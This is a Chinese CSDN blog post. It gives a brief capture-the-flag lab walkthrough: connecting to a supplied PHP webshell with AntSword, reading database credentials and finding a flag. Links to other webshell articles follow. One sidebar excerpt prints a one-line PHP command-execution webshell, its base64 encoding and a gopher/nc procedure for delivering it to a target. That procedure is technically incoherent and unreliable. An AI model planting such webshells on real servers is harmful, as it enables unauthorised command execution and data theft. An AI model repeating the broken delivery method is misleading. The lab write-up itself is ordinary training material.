命令执行:webshell&中国菜刀

最新推荐文章于 2023-02-24 14:24:06 发布
最新推荐文章于 2023-02-24 14:24:06 发布
阅读量605 收藏 2
点赞数
分类专栏: 靶场练习笔记 文章标签: shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56229643/article/details/120761214
版权

靶场地址:http://www.whalwl.xyz:8013

 

解题准备:了解webshell的基本原理,以及连接数据库的参数定义

解题思路:

1、进入网站,直接告诉了webshell地址和连接密码

 2、使用中国蚁剑,连接成功。

 3、进入文件管理,一共四个文件,从init.php得到数据库配置信息

4、 手动连接数据库

5、填写数据库配置,测试连接成功,添加! 

6、 从数据库中找到flag。

漏了个大洞
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python模拟菜刀反弹shell绕过限制【推荐】
09-19
主要介绍了利用python模拟菜刀反弹shell绕过限制,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
浅谈在WEBSHELL下如何运行命令
02-24
随着互联网的发展和互联网用户的快速增长,越来越多的应用都转向B/S结构,因为它是跨平台的、易操作的、方便的、迅速的,这样不论用户使用什么样的操作系统,仅仅需要安装一个浏览器就能享受在线购物、网上支付、看电影、写博客等等各种各样便捷的服务,特别是WEB2.0时代的到来更增添了互联网的
WebShell密码爆破
10-23
WebShell密码爆破工具V1.0教程
菜刀虚拟终端原理
qq_40334963的博客
04-08 1446
菜刀虚拟终端系统命令执行原理分析。 菜刀传输恶意代码的方式:通过调用array_map函数,对敏感字符串做字符串拼接和大小写混合,对核心代码做base64加密。 代码执行步骤: 1.关闭脚本信息报错 2.获取当前文件绝对路径 3.字符串拼接系统命令 4.调用proc_open函数执行拼接的系统命令 5.输出结果 6.结束脚本
菜刀webshell特征分析
博客地址 www.sec0nd.top
08-01 1373
Webshell是hacker经常使用的一种恶意脚本,其目的是获得对服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。hacker通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。有个想法,看看他这个工具的原理,再分析一下菜刀的特征。我用的最多的就是菜刀,蚁剑安装不上,后面有机会再分析。......
catf1ag Web中命令执行与Webshell详解
Aiwin的博客
05-10 1153
关于catflag平台中Webshell与无字符Webshell做题的记录
[投稿]Webshell下命令执行限制及绕过方法
Coisini的博客
06-23 4029
0x00 前言 上传webshell后,执行命令时或许没法执行了,这时我们该分析下原理并想出绕过方式,防守方也必须根据绕过方式想想更强的防御. 0x01 php webshell执行命令原理 php webshell(以下简称webshell)下是怎么执行系统命令的?我们找一个webshell分析下 搜索关键字定位到以下代码 function execute($cfe) { $re...
拿到webshell后虚拟终端拒绝访问
sudo0m的博客
08-20 2042
#0x00 拿到Webshell后输入命令都是拒绝访问,不管你输了什么都是拒绝访问就像这样: 这是因为没有设置终端,现在设置一下终端 cmd下载地址: https://sudo0m.coding.me/update/webshell/cmd.exe #0x01 可以输命令,但是还是拒绝访问,权限不够iis6.0可以进行溢出,(我是个小白所以,,) iis6.0才可进行以下操作,...
〖教程〗Ladon连接WebShell一句话远程执行命令
K8哥哥
05-31 571
前言 在内网渗透中,横向移动用的最多的就是远程执行命令了,网上有很多相关工具,系统也自带相关命令。但不是体积大就是命令繁琐,如schtasks命令等,执行需先创建任务、执行任务、删除任务等,命令长,输错会浪费很多时间,即使复制粘贴也很麻烦。体积大的如Impacket中的psexec/atexec/smbexec/wmiexec等,若是使用PY2.7编译低版本最小也5M左右,最大可能37.5M,无论是内存加载或是传到目标都很麻烦,如果后渗透工具垃圾,区区这几M还未必能传上去,传上去得浪费很多时间。传一个就5M
中国菜刀使用与原理分析
热门推荐
weixin_45597678的博客
12-04 1万+
中国菜刀的功能 中国菜刀的使用 原理分析
.NETWebShell:.net 命令执行的webshell
05-06
.NETWebShell2021.03.11 动态编译实现任意命令执行,Windows Defender 免杀
渗透系列:Webshell的介绍及工具的使用
最新发布
01-14
渗透系列:Webshell的介绍及工具的使用
WebShell:Webshel​​l &&后门集合
02-05
WebShell的这是一个Webshel​​l开源项目类别ar Ascx 阿什克斯阿斯玛克斯天冬氨酸Aspx C Cfm Cgi Java脚本Jsp px 执照MySQL的Nginx的其他p l 自述文件SSH协议肥皂乌德普微信狗狗icmp 罐节点js 开火操作系统pwnginx ...
SweetPotato_webshell下执行命令版1
08-03
前言管道引用申明if(CreatePipe(ref out_read, ref out_write, ref saAttr, 0)){Console.Write
Shuffle::mahjong_red_dragon:WebShell后门框架
05-14
要创建Webshel​​l运行,请执行以下操作: $ python shuffle.py -g webshell.php -p h4x0r Webshel​​l会在shuffle文件夹中生成。 ~ /shuffle/out/webshell.php 连接中 当您将外壳程序上载到计算机时,您需要...
靶机渗透测试实战 ——> peixun-server
weixin_45116657的博客
10-21 1524
一、信息收集 1、nmap扫描内网主机; 命令:nmap -sn 192.168.85.0/24 2、通过nmap扫描端口服务; 命令:nmap -sV -sC -sT -p- 192.168.85.131 3、通过firefox浏览器访问peixun的80的端口; 【思路】 通过浏览网页信息,发现不是cms,是自己写的网站 ——> 扫描工具、扫描目标,根据网页上的功能做测试点; ...
系统提权
weixin_30564785的博客
06-27 166
1.在中国菜刀中在需要连接的点,右键单击打开虚拟终端; 2.输入whoami; 3.打开dir 4.将pr.exe上传到upload目录下,输入以下命令提权: 5.输入以下命令新建用户: 6,查看生成的用户: 转载于:https://www.cnblogs.com/moxuexiaotong/p/9234930.html...
中国菜刀原理与实践
悦分享
08-03 1591
中国菜刀(Chopper)是一款经典的网站管理工具,具有文件管理、数据库管理、虚拟终端等功能。服务端其中‍Sp4ar是连接密码,可以随意更改。也可对服务端做一些混淆操作。配置类型 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种主机地址 主机地址可为机器名或IP地址,如localhost数据库用户 连接数据库的用户名,如root数据库密码 连接数据库的密码,如123456。...
命令执行漏洞多种写入webshell方式总结
Thunderclap的博客
02-24 2429
, 这些字符与双引号一起使用时具有特殊含义,并且在显示之前对其进行评估。单引号中的任何字符都没有特殊含义, 当你不想使用转义字符来更改 shell 脚本解释输入字符串参数方式时,就会很方便。简而言之,shell 将逐字解释单引号内的封闭文本,并且不会插入任何内容,包括变量、反引号、某些 \ 转义符等。在windows中,批处理需要转义字符主要有 “&”,“|”,“”等等,转义字符为”^”在Linux中,需要转义字符主要是 单引号 或者双引号 对于单引号,我们将其替换为\47即可。
使用gopher协议写webshell的详细流程并执行
06-06
使用 Gopher 协议写 Webshell 的详细流程如下: 1. 编写 Webshell 脚本:首先需要编写一个 Webshell 脚本,可以使用 PHP、Perl、Python 等语言编写,脚本需要实现远程命令执行和文件上传等功能。例如,以下是一个简单的 PHP Webshell: ``` <?php echo system($_GET['cmd']); ?> ``` 2. 将 Webshell 脚本进行 base64 编码:使用 base64 工具将 Webshell 脚本进行编码,以便后面将其插入到 Gopher URL 中。例如,在 Linux 系统上可以使用以下命令进行编码: ``` cat shell.php | base64 ``` 3. 构造 Gopher URL:将编码后的 Webshell 脚本插入到 Gopher URL 中,形如 `gopher://hostname:port/_<base64-encoded-php-script>`。其中,`hostname` 和 `port` 分别为目标主机和端口号,`base64-encoded-php-script` 为编码后的 Webshell 脚本。 例如,假设 Webshell 脚本编码后的内容为 `PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pg==`,目标主机为 `192.168.1.100`,端口号为 `80`,则构造的 Gopher URL 如下: ``` gopher://192.168.1.100:80/_PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pg== ``` 4. 发送 Gopher 请求:使用浏览器或者 curl 等工具访问构造的 Gopher URL,从而触发 Webshell 脚本执行。例如,在 Linux 系统上可以使用以下命令发送 Gopher 请求: ``` printf "GET /_%s HTTP/1.0\r\n\r\n" "PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pg==" | nc -w 1 192.168.1.100 80 ``` 其中,`-w 1` 表示设置超时时间为 1 秒,`192.168.1.100` 和 `80` 分别为目标主机和端口号。 5. 执行命令或者上传文件:发送 Gopher 请求后,在浏览器的地址栏中输入相应的命令参数,即可执行远程命令;或者上传文件到目标服务器。例如,输入以下命令参数可以执行 `ls` 命令: ``` ?cmd=ls%20-la ``` 完整的步骤如下所示: 1. 编写 PHP Webshell 脚本: ```php <?php echo system($_GET['cmd']); ?> ``` 2. 使用 base64 工具编码 Webshell 脚本: ``` cat shell.php | base64 ``` 编码后的结果为: ``` PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pg== ``` 3. 构造 Gopher URL: ``` gopher://192.168.1.100:80/_PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pg== ``` 4. 发送 Gopher 请求: ``` printf "GET /_%s HTTP/1.0\r\n\r\n" "PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pg==" | nc -w 1 192.168.1.100 80 ``` 5. 在浏览器的地址栏中输入命令参数 `?cmd=ls%20-la`,即可执行 `ls -la` 命令,输出目录的详细信息。 需要注意的是,使用 Gopher 协议写 Webshell 存在一定的风险,容易被防火墙和安全设备识别和拦截。因此,在实际应用中,需要根据具体情况进行选择和调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值